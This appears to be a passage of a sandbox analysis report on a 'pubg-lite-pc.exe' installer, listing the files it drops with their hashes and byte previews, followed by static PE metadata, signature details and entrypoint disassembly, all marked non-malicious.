                                                                                              SHA-512:AFF21E3E00B39F8983D101A0C616CA84CC3DC72D6464A0DD331965CF6BECCF9B45025A7DB2042D6E8B05221D3EB5813445C8ADA69AE96E2727A607398A3DE3D9
                                                                                              Malicious:false
                                                                                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......b2..&S..&S..&S..28..+S..28..S...'..)S...'..1S...'..aS..28..?S..28..'S..28..;S..&S..wR...'..tS...'..'S...'+.'S..&SC.'S...'..'S..Rich&S..........................PE..L.....`.........."!.................Z..............................................a.....@.........................@n.......v..........0.......................d?..X...p...............................@............... ............................text............................... ..`.rdata.............................@..@.data...............................@....rsrc...0...........................@..@.reloc..d?.......@..................@..B........................................................................................................................................................................................................................................................................

                                                                                              C:\Windows\Installer\MSI395.tmp

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):388064
                                                                                              Entropy (8bit):6.407392408414975
                                                                                              Encrypted:false
                                                                                              SSDEEP:6144:U7C5QB3/CNG2HBOqf2BLuoZSKYfuAO8DOE09VKYnyZwYW:qB3WBOG2BPDKSf9VtyZNW
                                                                                              MD5:20C782EB64C81AC14C83A853546A8924
                                                                                              SHA1:A1506933D294DE07A7A2AE1FBC6BE468F51371D6
                                                                                              SHA-256:0ED6836D55180AF20F71F7852E3D728F2DEFE22AA6D2526C54CFBBB4B48CC6A1
                                                                                              SHA-512:AFF21E3E00B39F8983D101A0C616CA84CC3DC72D6464A0DD331965CF6BECCF9B45025A7DB2042D6E8B05221D3EB5813445C8ADA69AE96E2727A607398A3DE3D9
                                                                                              Malicious:false
                                                                                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......b2..&S..&S..&S..28..+S..28..S...'..)S...'..1S...'..aS..28..?S..28..'S..28..;S..&S..wR...'..tS...'..'S...'+.'S..&SC.'S...'..'S..Rich&S..........................PE..L.....`.........."!.................Z..............................................a.....@.........................@n.......v..........0.......................d?..X...p...............................@............... ............................text............................... ..`.rdata.............................@..@.data...............................@....rsrc...0...........................@..@.reloc..d?.......@..................@..B........................................................................................................................................................................................................................................................................

                                                                                              C:\Windows\Installer\MSI3E43.tmp

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):554976
                                                                                              Entropy (8bit):6.564031509584106
                                                                                              Encrypted:false
                                                                                              SSDEEP:12288:muE7WkO++qXMFMHVwdw2G0NvLCXny2nnQiJr3c+/8d0jMfIPUQMPT6INiIsvMrhG:sWDMNYIy2nZJr3c+/8d0QfI2WI8IGMrU
                                                                                              MD5:2A7B214E782C8807B9B87B66B9897679
                                                                                              SHA1:400FD663C0579566B27FCCA0107DE5DD54C1372D
                                                                                              SHA-256:CE5D590FCC4270BB347EFEAA58A283C6551821248D33E20ECDC4156AC27710A4
                                                                                              SHA-512:95DB659FC2A462780200C109C859D84156585D07DF87D6B85491149E62F1CE329D30D63D99931A6AF1810CC7CED3624E1864F2DBD1075A8DA0DC42136BDCC186
                                                                                              Malicious:false
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............@...@...@..A...@..AW..@..A...@&..A...@&..A...@..@...@&..A...@..A...@...@...@$..A...@$..A...@$..@...@..x@...@$..A...@Rich...@........PE..L...@.`.........."!.....4...:......l........P......................................r.....@.................................h...x....@...............^.......P...O...X..p....................Z.......Y..@............P...............................text...X3.......4.................. ..`.rdata..|....P.......8..............@..@.data...............................@....rsrc........@......................@..@.reloc...O...P...P..................@..B........................................................................................................................................................................................................................................................................................

                                                                                              C:\Windows\Installer\MSI3F4.tmp

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):878560
                                                                                              Entropy (8bit):6.452749824306929
                                                                                              Encrypted:false
                                                                                              SSDEEP:24576:QK8S3AccKkqSojmrhCMou5vk3Y+ukDln/hFRFNUEekB:QK8tKk5ojmrhCMz5vk3ukDln/hFRFNU0
                                                                                              MD5:D51A7E3BCE34C74638E89366DEEE2AAB
                                                                                              SHA1:0E68022B52C288E8CDFFE85739DE1194253A7EF0
                                                                                              SHA-256:7C6BDF16A0992DB092B7F94C374B21DE5D53E3043F5717A6EECAE614432E0DF5
                                                                                              SHA-512:8ED246747CDD05CAC352919D7DED3F14B1E523CCC1F7F172DB85EED800B0C5D24475C270B34A7C25E7934467ACE7E363542A586CDEB156BFC484F7417C3A4AB0
                                                                                              Malicious:false
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........j{..............`.......`..W...<.......<.......<.......`.......`.......`..............>.......>.......>...............>.......Rich....................PE..L...}.`.........."!.........|...........................................................@............................t...T........................N..............X}..p....................~.......}..@............................................text............................... ..`.rdata..............................@..@.data...\...........................@....rsrc................^..............@..@.reloc...............d..............@..B................................................................................................................................................................................................................................................................................

                                                                                              C:\Windows\Installer\MSI7331.tmp

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):554976
                                                                                              Entropy (8bit):6.564031509584106
                                                                                              Encrypted:false
                                                                                              SSDEEP:12288:muE7WkO++qXMFMHVwdw2G0NvLCXny2nnQiJr3c+/8d0jMfIPUQMPT6INiIsvMrhG:sWDMNYIy2nZJr3c+/8d0QfI2WI8IGMrU
                                                                                              MD5:2A7B214E782C8807B9B87B66B9897679
                                                                                              SHA1:400FD663C0579566B27FCCA0107DE5DD54C1372D
                                                                                              SHA-256:CE5D590FCC4270BB347EFEAA58A283C6551821248D33E20ECDC4156AC27710A4
                                                                                              SHA-512:95DB659FC2A462780200C109C859D84156585D07DF87D6B85491149E62F1CE329D30D63D99931A6AF1810CC7CED3624E1864F2DBD1075A8DA0DC42136BDCC186
                                                                                              Malicious:false
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............@...@...@..A...@..AW..@..A...@&..A...@&..A...@..@...@&..A...@..A...@...@...@$..A...@$..A...@$..@...@..x@...@$..A...@Rich...@........PE..L...@.`.........."!.....4...:......l........P......................................r.....@.................................h...x....@...............^.......P...O...X..p....................Z.......Y..@............P...............................text...X3.......4.................. ..`.rdata..|....P.......8..............@..@.data...............................@....rsrc........@......................@..@.reloc...O...P...P..................@..B........................................................................................................................................................................................................................................................................................

                                                                                              C:\Windows\Installer\MSIA27C.tmp

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                              Category:modified
                                                                                              Size (bytes):554976
                                                                                              Entropy (8bit):6.564031509584106
                                                                                              Encrypted:false
                                                                                              SSDEEP:12288:muE7WkO++qXMFMHVwdw2G0NvLCXny2nnQiJr3c+/8d0jMfIPUQMPT6INiIsvMrhG:sWDMNYIy2nZJr3c+/8d0QfI2WI8IGMrU
                                                                                              MD5:2A7B214E782C8807B9B87B66B9897679
                                                                                              SHA1:400FD663C0579566B27FCCA0107DE5DD54C1372D
                                                                                              SHA-256:CE5D590FCC4270BB347EFEAA58A283C6551821248D33E20ECDC4156AC27710A4
                                                                                              SHA-512:95DB659FC2A462780200C109C859D84156585D07DF87D6B85491149E62F1CE329D30D63D99931A6AF1810CC7CED3624E1864F2DBD1075A8DA0DC42136BDCC186
                                                                                              Malicious:false
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............@...@...@..A...@..AW..@..A...@&..A...@&..A...@..@...@&..A...@..A...@...@...@$..A...@$..A...@$..@...@..x@...@$..A...@Rich...@........PE..L...@.`.........."!.....4...:......l........P......................................r.....@.................................h...x....@...............^.......P...O...X..p....................Z.......Y..@............P...............................text...X3.......4.................. ..`.rdata..|....P.......8..............@..@.data...............................@....rsrc........@......................@..@.reloc...O...P...P..................@..B........................................................................................................................................................................................................................................................................................

                                                                                              C:\Windows\Installer\MSIA4.tmp

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):780768
                                                                                              Entropy (8bit):6.387720196228063
                                                                                              Encrypted:false
                                                                                              SSDEEP:12288:8tlNr2btWAp/wEqjh/lNKCQSZ1YVzsRiiqn6BbFAmrhymkM49+Og2Z04KHjJaI/5:8tlNrgpSZKVsRkn4frUMXjJaI/tWogPa
                                                                                              MD5:573F5E653258BF622AE1C0AD118880A2
                                                                                              SHA1:E243C761983908D14BAF6C7C0879301C8437415D
                                                                                              SHA-256:371D1346EC9CA236B257FED5B5A5C260114E56DFF009F515FA543E11C4BB81F7
                                                                                              SHA-512:DFFF15345DBF62307C3E6A4C0B363C133D1A0B8B368492F1200273407C2520B33ACB20BFF90FEAC356305990492F800844D849EE454E7124395F945DE39F39EA
                                                                                              Malicious:false
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......#P.Qg1..g1..g1..sZ..j1..sZ...1...E..v1...E..p1...E..51..sZ...1..sZ..f1..sZ..z1..g1..T0...E..+1...E..f1...Ex.f1..g1..e1...E..f1..Richg1..........PE..L.../.`.........."!.........B......4................................................j....@..........................;......@=...............................0......X%..p....................&.......%..@............................................text............................... ..`.rdata..............................@..@.data.......P.......@..............@....rsrc...............................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................

                                                                                              C:\Windows\Installer\MSIE516.tmp

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):554976
                                                                                              Entropy (8bit):6.564031509584106
                                                                                              Encrypted:false
                                                                                              SSDEEP:12288:muE7WkO++qXMFMHVwdw2G0NvLCXny2nnQiJr3c+/8d0jMfIPUQMPT6INiIsvMrhG:sWDMNYIy2nZJr3c+/8d0QfI2WI8IGMrU
                                                                                              MD5:2A7B214E782C8807B9B87B66B9897679
                                                                                              SHA1:400FD663C0579566B27FCCA0107DE5DD54C1372D
                                                                                              SHA-256:CE5D590FCC4270BB347EFEAA58A283C6551821248D33E20ECDC4156AC27710A4
                                                                                              SHA-512:95DB659FC2A462780200C109C859D84156585D07DF87D6B85491149E62F1CE329D30D63D99931A6AF1810CC7CED3624E1864F2DBD1075A8DA0DC42136BDCC186
                                                                                              Malicious:false
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............@...@...@..A...@..AW..@..A...@&..A...@&..A...@..@...@&..A...@..A...@...@...@$..A...@$..A...@$..@...@..x@...@$..A...@Rich...@........PE..L...@.`.........."!.....4...:......l........P......................................r.....@.................................h...x....@...............^.......P...O...X..p....................Z.......Y..@............P...............................text...X3.......4.................. ..`.rdata..|....P.......8..............@..@.data...............................@....rsrc........@......................@..@.reloc...O...P...P..................@..B........................................................................................................................................................................................................................................................................................

                                                                                              C:\Windows\Installer\bcfe14.msi

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                              File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {7635BF72-F904-48E9-A5E0-CD77B63088C0}, Number of Words: 0, Subject: pubg-lite-pc, Author: Common Apps, Name of Creating Application: Advanced Installer 18.3 build e2a0201b, Template: x64;1033, Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
                                                                                              Category:dropped
                                                                                              Size (bytes):4094464
                                                                                              Entropy (8bit):6.547203235586271
                                                                                              Encrypted:false
                                                                                              SSDEEP:98304:lY5AKxMKKknz5vquOjDT+Yn4POYWIdjfIRuRvdisRe4frUMXj:GnYuOjDKYn49d2uHisRVj
                                                                                              MD5:918288F3B5A6BD0E461AF50517273210
                                                                                              SHA1:BAC9AD4AF1B50142612D743577A70DE6DC802EB5
                                                                                              SHA-256:BA89E19751BD5F845669C8FE1C32FEC3BB8ED380CA058DB04B69E6F1E48BE24E
                                                                                              SHA-512:A3DABFC4DECEBA69E051CE1D3AD7D5FF1BB7A5FA2ED09EE65785569CF990B4F9122E433654010A2657E558E11148F18BDF025DD650414780F0EA5187047E814A
                                                                                              Malicious:false
                                                                                              Preview:......................>...................?...................................{...............................................................................o...p...q.......................................O...P...Q...R...S...T...U...V...W...........................................................................................................................................................................................................................................................................................m...............*...8........................................................................................... ...!..."...#...$...%...&...'...(...)...7...+...:...-......./...0...1...2...3...4...5...6.......9...L...;...?...<...=...>...A...@...I...B...C...D...E...F...G...H.......J...K...R...M...N...O...P...Q.......S...l...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k.......n...z...o...p...q...r...s...t...u...v...w...x...y...|...

                                                                                              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                              File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):631710
                                                                                              Entropy (8bit):5.40434340732333
                                                                                              Encrypted:false
                                                                                              SSDEEP:3072:76sAoN1IAMVcB6J3l7NPh7sOyQSiMbRolrNWG6x+Rkeov8Qj9lOx2s9OW1LRuuGV:TFfxq8RfKF0DuzoxUDYYkt
                                                                                              MD5:1DDB12249985D3268833A70A9EC0909C
                                                                                              SHA1:B2235D29E7AC6633C9FD584049104334839B8F0F
                                                                                              SHA-256:DC73040C904084694B9B339F55D1B77B071ECB1E3C33EB65B68FC6329D8B1CF1
                                                                                              SHA-512:C7DE24AC4FE86213E7EDE4756452E41E67D74F63CACE12DF2FD961A4509C23610EE6D6578F91C4A457ADD5E45A613614A899396E32D65A3085125FA55F852840
                                                                                              Malicious:false
                                                                                              Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 09:59:37.236 [4684]: Command line: D:\wd\compilerTemp\BMT.i51yo0aa.beh\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 09:59:37.255 [4684]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 09:59:37.299 [4684]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 09:59:37.299 [4684]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 09:59:37.299 [

                                                                                              \Device\Mup\computer*\MAILSLOT\NET\NETLOGON

                                                                                              Download File
                                                                                              Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):64
                                                                                              Entropy (8bit):3.670063206984032
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:GlDTlDX55I2Y1AnsTB+lLn:GlDpsGyBaLn
                                                                                              MD5:654D13AAD76F346D1D51B0B023BA3A39
                                                                                              SHA1:31F6EE56B1F48F3D07F4C93485310698DA5CED68
                                                                                              SHA-256:82CC0A5F2EB06E0F1966DEB7B29A6A7C938AEFFBA10464B13E30AF42E43BE260
                                                                                              SHA-512:F1C9D26451F85A446BC89E59BB1425ADDA6AA743F1FFD392D7DE4CFC525EB2EE87B76DBC5B184EF919EF1678D4A3B9249A7DB6085F9A2473DAB752089EE38E20
                                                                                              Malicious:false
                                                                                              Preview:....4.0.5.4.6.4.....\MAILSLOT\NET\GETDC98EF613F.................

                                                                                              Static File Info

                                                                                              General

                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                              Entropy (8bit):6.977448293144871
                                                                                              TrID:
                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                              File name:pubg-lite-pc.exe
                                                                                              File size:3361288
                                                                                              MD5:f4cb6419f1f44ee47cf33faabf672a48
                                                                                              SHA1:e0864f7f7421de374bf9377e4ac0f882396d13d2
                                                                                              SHA256:45c174aea886470795ec2a23ad391c5d724827cd8e59d83768aaee77c8a9cce1
                                                                                              SHA512:5cc831bd6c01669e4872a57538bc90847b94494bdca53da6185ca1709c17cc33202028b5d9f8f4bd85fba7288fde286be37f9a3393105c5c99303ab25464f25d
                                                                                              SSDEEP:98304:R90PbbHgUQTLFwHImICoT7uHvT3xiQ02eJe1QX5:2bbHCm87uHv9xy5
                                                                                              TLSH:A8F58C30768AC53BD56209706A2CDBBF51687FA50F7194C7A3D81E6F34B48C29632E27
                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........b...1...1...1...0...1...0T..1...0...18..0...18..0...18..0...1...0...1...0...1...0...1...1+..1:..0...1:.Z1...1..21...1:..0...

                                                                                              File Icon

                                                                                              Icon Hash:00e4ecc8c8dccc00

                                                                                              Static PE Info

                                                                                              General

                                                                                              Entrypoint:0x526179
                                                                                              Entrypoint Section:.text
                                                                                              Digitally signed:true
                                                                                              Imagebase:0x400000
                                                                                              Subsystem:windows gui
                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                              Time Stamp:0x60ABD1D3 [Mon May 24 16:18:27 2021 UTC]
                                                                                              TLS Callbacks:
                                                                                              CLR (.Net) Version:
                                                                                              OS Version Major:6
                                                                                              OS Version Minor:0
                                                                                              File Version Major:6
                                                                                              File Version Minor:0
                                                                                              Subsystem Version Major:6
                                                                                              Subsystem Version Minor:0
                                                                                              Import Hash:1ee3b0da38e7b7c567f93f357ca3751c

                                                                                              Authenticode Signature

                                                                                              Signature Valid:false
                                                                                              Signature Issuer:E=support@fss.com, CN=FreeShareSoft, OU=TI, O=FreeShareSoft, L=Orlando, S=Florida, C=US
                                                                                              Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                              Error Number:-2146762487
                                                                                              Not Before, Not After
                                                                                              • 12/01/2021 13:45:45 12/01/2022 13:45:45
                                                                                              Subject Chain
                                                                                              • E=support@fss.com, CN=FreeShareSoft, OU=TI, O=FreeShareSoft, L=Orlando, S=Florida, C=US
                                                                                              Version:1
                                                                                              Thumbprint MD5:7EAD0ABAE216C681F7A8C2843DB84663
                                                                                              Thumbprint SHA-1:F63135AA827D50A6A2C3896B98364B6DDE68D065
                                                                                              Thumbprint SHA-256:337E92179CF16789F3E334433E54AE847BD64A508E472A38EF3A92F181D21A60
                                                                                              Serial:5562B191FB9D7C568F2AD551440CEB649C29F3FE

                                                                                              Entrypoint Preview

                                                                                              Instruction
                                                                                              call 00007F08CCE1B7DAh
                                                                                              jmp 00007F08CCE1AFCFh
                                                                                              int3
                                                                                              int3
                                                                                              int3
                                                                                              int3
                                                                                              int3
                                                                                              int3
                                                                                              int3
                                                                                              int3
                                                                                              int3
                                                                                              int3
                                                                                              int3
                                                                                              int3
                                                                                              int3
                                                                                              push ecx
                                                                                              lea ecx, dword ptr [esp+08h]
                                                                                              sub ecx, eax
                                                                                              and ecx, 0Fh
                                                                                              add eax, ecx
                                                                                              sbb ecx, ecx
                                                                                              or eax, ecx
                                                                                              pop ecx
                                                                                              jmp 00007F08CCE1B8BFh
                                                                                              push ecx
                                                                                              lea ecx, dword ptr [esp+08h]
                                                                                              sub ecx, eax
                                                                                              and ecx, 07h
                                                                                              add eax, ecx
                                                                                              sbb ecx, ecx
                                                                                              or eax, ecx
                                                                                              pop ecx
                                                                                              jmp 00007F08CCE1B8A9h
                                                                                              mov ecx, dword ptr [ebp-0Ch]
                                                                                              mov dword ptr fs:[00000000h], ecx
                                                                                              pop ecx
                                                                                              pop edi
                                                                                              pop edi
                                                                                              pop esi
                                                                                              pop ebx
                                                                                              mov esp, ebp
                                                                                              pop ebp
                                                                                              push ecx
                                                                                              ret
                                                                                              mov ecx, dword ptr [ebp-10h]
                                                                                              xor ecx, ebp
                                                                                              call 00007F08CCE1A5E5h
                                                                                              jmp 00007F08CCE1B130h
                                                                                              push eax
                                                                                              push dword ptr fs:[00000000h]
                                                                                              lea eax, dword ptr [esp+0Ch]
                                                                                              sub esp, dword ptr [esp+0Ch]
                                                                                              push ebx
                                                                                              push esi
                                                                                              push edi
                                                                                              mov dword ptr [eax], ebp
                                                                                              mov ebp, eax
                                                                                              mov eax, dword ptr [005DD024h]
                                                                                              xor eax, ebp
                                                                                              push eax
                                                                                              push dword ptr [ebp-04h]
                                                                                              mov dword ptr [ebp-04h], FFFFFFFFh
                                                                                              lea eax, dword ptr [ebp-0Ch]
                                                                                              mov dword ptr fs:[00000000h], eax
                                                                                              ret
                                                                                              push eax
                                                                                              push dword ptr fs:[00000000h]
                                                                                              lea eax, dword ptr [esp+0Ch]
                                                                                              sub esp, dword ptr [esp+0Ch]
                                                                                              push ebx
                                                                                              push esi
                                                                                              push edi
                                                                                              mov dword ptr [eax], ebp
                                                                                              mov ebp, eax
                                                                                              mov eax, dword ptr [005DD024h]
                                                                                              xor eax, ebp
                                                                                              push eax
                                                                                              mov dword ptr [ebp-10h], eax
                                                                                              push dword ptr [ebp-04h]
                                                                                              mov dword ptr [ebp-04h], 00FFFFFFh

                                                                                              Data Directories

                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x1dbce40x28.rdata
                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x1e40000x21c68.rsrc
                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x3332d80x1730
                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x2060000x1967c.reloc
                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x1a39c80x70.rdata
                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x1a3a400x18.rdata
                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x17fe880x40.rdata
                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x17e0000x2c0.rdata
                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x1d93800x260.rdata
                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                              Sections

                                                                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                              .text0x10000x17c98f0x17ca00False0.4560235786124795data6.449098492368358IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                              .rdata0x17e0000x5ecdc0x5ee00False0.3235728549077734data4.5819624017522385IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                              .data0x1dd0000x6e700x5600False0.13126816860465115data2.036748742564968IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                              .rsrc0x1e40000x21c680x21e00False0.20060251383763839data3.8022307857772315IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                              .reloc0x2060000x1967c0x19800False0.5048062193627451data6.563997462501353IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                              Resources

                                                                                              NameRVASizeTypeLanguageCountry
                                                                                              IMAGE_FILE0x1e4a280x6ISO-8859 text, with no line terminatorsEnglishUnited States
                                                                                              IMAGE_FILE0x1e4a300x6ISO-8859 text, with no line terminatorsEnglishUnited States
                                                                                              RTF_FILE0x1e4a380x2e9Rich Text Format data, version 1, ANSIEnglishUnited States
                                                                                              RTF_FILE0x1e4d240xa1Rich Text Format data, version 1, ANSIEnglishUnited States
                                                                                              RT_BITMAP0x1e4dc80x13edataEnglishUnited States
                                                                                              RT_BITMAP0x1e4f080x828dBase III DBT, version number 0, next free block index 40EnglishUnited States
                                                                                              RT_BITMAP0x1e57300x48a8dBase III DBT, version number 0, next free block index 40EnglishUnited States
                                                                                              RT_BITMAP0x1e9fd80xa6adataEnglishUnited States
                                                                                              RT_BITMAP0x1eaa440x152dataEnglishUnited States
                                                                                              RT_BITMAP0x1eab980x828dBase III DBT, version number 0, next free block index 40EnglishUnited States
                                                                                              RT_ICON0x1eb3c00x10828dataEnglishUnited States
                                                                                              RT_ICON0x1fbbe80x25a8dataEnglishUnited States
                                                                                              RT_ICON0x1fe1900x10a8dataEnglishUnited States
                                                                                              RT_ICON0x1ff2380x988dataEnglishUnited States
                                                                                              RT_ICON0x1ffbc00x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                              RT_MENU0x2000280x5cdataEnglishUnited States
                                                                                              RT_MENU0x2000840x2adataEnglishUnited States
                                                                                              RT_DIALOG0x2000b00xacdataEnglishUnited States
                                                                                              RT_DIALOG0x20015c0x2a6dataEnglishUnited States
                                                                                              RT_DIALOG0x2004040x3b4dataEnglishUnited States
                                                                                              RT_DIALOG0x2007b80xbcdataEnglishUnited States
                                                                                              RT_DIALOG0x2008740x204dataEnglishUnited States
                                                                                              RT_DIALOG0x200a780x282dataEnglishUnited States
                                                                                              RT_DIALOG0x200cfc0xccdataEnglishUnited States
                                                                                              RT_DIALOG0x200dc80x146dataEnglishUnited States
                                                                                              RT_DIALOG0x200f100x226dataEnglishUnited States
                                                                                              RT_DIALOG0x2011380x388dataEnglishUnited States
                                                                                              RT_DIALOG0x2014c00x1b4dataEnglishUnited States
                                                                                              RT_DIALOG0x2016740x136dataEnglishUnited States
                                                                                              RT_DIALOG0x2017ac0x4cdataEnglishUnited States
                                                                                              RT_STRING0x2017f80x45cdataEnglishUnited States
                                                                                              RT_STRING0x201c540x344dataEnglishUnited States
                                                                                              RT_STRING0x201f980x2f8dataEnglishUnited States
                                                                                              RT_STRING0x2022900x598dataEnglishUnited States
                                                                                              RT_STRING0x2028280x3aadataEnglishUnited States
                                                                                              RT_STRING0x202bd40x5c0dataEnglishUnited States
                                                                                              RT_STRING0x2031940x568dataEnglishUnited States
                                                                                              RT_STRING0x2036fc0x164dataEnglishUnited States
                                                                                              RT_STRING0x2038600x520dataEnglishUnited States
                                                                                              RT_STRING0x203d800x1a0dataEnglishUnited States
                                                                                              RT_STRING0x203f200x18adataEnglishUnited States
                                                                                              RT_STRING0x2040ac0x216dataEnglishUnited States
                                                                                              RT_STRING0x2042c40x624dataEnglishUnited States
                                                                                              RT_STRING0x2048e80x660dataEnglishUnited States
                                                                                              RT_STRING0x204f480x2a8dataEnglishUnited States
                                                                                              RT_GROUP_ICON0x2051f00x14dataEnglishUnited States
                                                                                              RT_VERSION0x2052040x2f0SysEx File - IDPEnglishUnited States
                                                                                              RT_MANIFEST0x2054f40x771XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States

                                                                                              Imports

                                                                                              DLLImport
